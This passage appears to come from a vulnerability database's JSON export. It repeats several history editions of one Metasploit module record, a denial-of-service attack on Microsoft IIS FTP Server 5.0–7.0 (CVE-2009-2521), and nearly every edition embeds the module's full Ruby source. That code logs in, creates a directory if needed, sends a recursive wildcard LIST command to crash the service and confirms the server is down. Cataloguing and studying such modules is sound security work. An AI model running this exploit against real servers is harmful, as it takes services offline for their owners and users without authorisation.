denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-03-24T11:42:50", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-03-24T13:51:20", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-03-24T13:51:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-03-24T13:51:20", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "20c45a17c1d36c44165e93a37a65b81f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-03-28T06:06:33", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-03-28T06:06:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-03-28T06:06:33", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-03-28T07:36:31", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-03-28T07:36:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-03-28T07:36:31", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "20c45a17c1d36c44165e93a37a65b81f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-04-01T04:31:27", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-04-01T04:31:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-04-01T04:31:27", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-04-01T06:39:21", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-04-01T06:39:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-04-01T06:39:21", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "20c45a17c1d36c44165e93a37a65b81f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-04-19T10:51:35", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-04-19T10:51:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 